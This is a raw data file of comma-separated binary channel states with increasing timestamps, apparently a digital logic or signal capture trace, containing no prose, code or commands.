0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036252e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036276e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036300e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036348e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036356e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4036376e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036400e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4036428e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036452e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4036456e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036460e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036576e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036600e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036628e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036652e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036676e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036700e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036748e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036756e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4036800e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4036828e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4036832e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036836e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4036948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4036976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037176e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037348e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037372e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037400e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037476e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4037480e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4037500e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4037524e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4037548e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4037576e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037580e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037628e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037652e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037800e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4037828e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4037876e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4037900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037908e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037924e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4037948e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4037972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038000e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038028e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038052e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038076e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038100e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4038104e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4038148e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4038176e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038180e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038348e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038400e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038572e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038600e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038628e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038652e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038676e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038700e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038724e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038776e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038800e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038828e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038852e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038876e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038900e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038924e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4038948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4038976e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039000e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039024e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039052e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039076e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039100e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039124e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039172e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039200e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039228e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039252e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039276e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039300e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039324e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039348e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039376e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039400e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039476e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039500e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039576e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039612e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039636e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039660e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4039688e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4039712e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4039740e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4164300e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4164528e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,3.4164556e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4164584e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,3.4164908e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4164936e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4164940e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4164960e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4164988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4165012e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4165036e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4165060e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4165084e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,3.4165108e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165132e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165136e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165160e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165212e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165236e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165260e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165360e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4165388e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4165436e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4165460e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165468e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165484e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165508e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165536e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165560e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165588e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,3.4165612e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4165616e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4165660e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4165684e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165692e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165736e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165760e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165788e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165812e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165836e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165860e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165936e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4165960e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4165988e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,3.4166012e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4166016e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4166060e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4166084e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166092e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166136e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166160e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166212e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166236e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166260e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166284e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4166292e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4166336e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4166360e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166368e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166412e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166436e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166460e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,3.4166464e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4166468e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4166512e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4166536e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4166540e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166544e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166560e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166612e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166636e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166660e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166684e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166736e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166760e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166788e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166812e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166860e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166908e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166936e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4166960e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4166988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167012e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167036e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167060e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167084e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4167092e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4167136e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4167160e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167168e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167188e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,3.4167212e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4167216e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4167260e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4167284e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167292e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167360e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167388e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167412e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167436e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167460e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167484e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4167492e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4167536e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4167560e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167568e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167588e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167612e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167636e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167660e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167684e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167708e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167736e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167760e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167788e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167812e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167836e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167860e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167884e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167908e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167936e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4167960e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4167988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168012e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168036e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168060e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168084e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168108e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168116e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4168164e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168188e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4168192e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168196e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168212e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168236e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168260e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168388e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168412e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168436e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168460e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168484e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168508e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168516e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4168536e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168560e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4168588e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168612e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4168616e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168620e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168660e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168684e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168736e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168760e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168788e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4168836e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4168860e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168868e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168884e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168908e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168936e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4168960e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4168988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169012e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169060e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169084e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169136e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169160e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169212e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169236e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169260e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169360e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169388e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169412e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169436e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169460e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169484e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169536e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169560e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169588e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169612e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169636e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169660e-02 1,1,0,0,1,0,0,0,0,1,0,0,0,0,3.4169664e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4169668e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4169684e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4169708e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4169736e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4169760e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4169764e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169768e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169812e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169836e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169860e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169884e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4169892e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4169936e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4169960e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4169968e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4169988e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170012e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170036e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170060e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170084e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170108e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170136e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170160e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4170164e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,3.4170208e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4170236e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,3.4170240e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170244e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170260e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170360e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170388e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170408e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170436e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170460e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170484e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170508e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170536e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170560e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170608e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170636e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170660e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170684e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170736e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170760e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170808e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170836e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170860e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170908e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170936e-02 